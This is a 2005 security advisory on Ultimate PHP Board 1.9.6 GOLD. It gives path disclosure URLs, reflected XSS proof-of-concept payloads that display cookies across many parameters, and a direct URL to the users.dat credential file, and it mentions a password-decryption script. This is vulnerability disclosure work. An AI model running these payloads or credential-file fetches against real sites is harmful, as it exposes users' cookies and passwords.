M4DR007-06SA (security advisory): Multiple vulnerabilities in UPB 1.9.6 GOLD Published: 06 16 2005 Released: 06 16 2005 Name: Ultimate PHP Board (UPB) Affected Systems: <= 1.9.6 GOLD Issue: Full Path Disclosure, Cross-Site Scripting, Sensitive Information Disclosure Author: Alberto Trivero Vendor: http://www.myupb.com/ourscripts_upb.php Software Description *********** "UPB is a forum/message board script. It supports threaded discussion with a comprehesive text database system that we wrote here at php outburst for the backend." Full Path Disclosure ******* Thanks to an improper control of the value of some variables it's possible to cause some errors and obtain the full path by sending simples requests like these: http://www.example.com/upb/viewtopic.php?id=0 http://www.example.com/upb/profile.php?action=get&id=0 http://www.example.com/upb/newpost.php?t_id=0 Cross-Site Scripting (XSS) ******* Let's look at code from login.php at line 69: <? ... echo "<form action='login.php?ref=$ref&l=1' method=POST> <center>$skin_tableheading ... ?> The $rev parameter can be controlled by a remote user and when UPB get the value don't sanitise properly it, so a malicious user can inject some HTML code like this: '><script>alert(document.cookie)</script> that will change the HTML line in: <form action='login.php?ref='><script>alert(document.cookie)</script>&l=1' method=POST> executing the <script>...</script> tag that show, in this case, the cookies. This is the PoC URL: http://www.example.com/upb/login.php?ref=%27%3E%3Cscript%3Ealert(document.co okie)%3C/script%3E Let's look now at code from viewtopic.php at line 13: <? ... $where = "<b>></b> <a href='viewforum.php?id=$id'>$w_forum[forum]</a> <b>></b> $w_topic[subject]"; ... ?> We can notice in the $id parameter the same preceding problem explottable with an URL like this: http://www.example.com/upb/viewtopic.php?id=%27%3E%3Cscript%3Ealert(document .cookie)%3C/script%3E These are other PoC URLs for other parameters: http://www.example.com/upb/viewtopic.php?id=1&t_id=1&page=%27%3E%3Cscript%3E alert(document.cookie)%3C/script%3E http://www.example.com/upb/profile.php?action=get&id=%27%3E%3Cscript%3Ealert (document.cookie)%3C/script%3E http://www.example.com/upb/newpost.php?id=1&t=1&t_id=%27%3E%3Cscript%3Ealert (document.cookie)%3C/script%3E http://www.example.com/upb/newpost.php?id=%27%3E%3Cscript%3Ealert(document.c ookie)%3C/script%3E http://www.example.com/upb/email.php?id=%27%3E%3Cscript%3Ealert(document.coo kies)%3C/script%3E http://www.example.com/upb/icq.php?action=get&id=%27%3E%3Cscript%3Ealert(doc ument.cookie)%3C/script%3E http://www.example.com/upb/aol.php?action=get&id=%27%3E%3Cscript%3Ealert(doc ument.cookie)%3C/script%3E http://www.example.com/upb/getpass.php?ref=%27%3E%3Cscript%3Ealert(document. cookie)%3C/script%3E http://www.example.com/upb/search.php?step=3&sText=%27%3E%3Cscript%3Ealert(d ocument.cookie)%3C/script%3E Sensitive Information Disclosure ********* In many cases (every time with non Apache webservers but some time also with its) it's possible to obtain sensitives informations about all the users registered on the UPB forum by surfing on this file: http://www.example.com/upb/db/users.dat and viewing informations structured in this way: user_name<~>password<~>level<~>email<~>view_email<~>mail_list<~>location<~>u rl<~>avatar<~>icq<~>aim<~>msn<~>sig<~>posts<~>date_added<~>id The passwords of users are crypted and for automate the decription I made a code available at this address: http://albythebest.altervista.org/upb.pl Solution ********* The vendor has been contacted many times but a patch was not yet produced. Alberto Trivero - trivero@xxxxxxxx Come cheer us at #security-it on Freenode ( irc.freenode.net ) (C) 2005 Copyright by Madroot Security Group
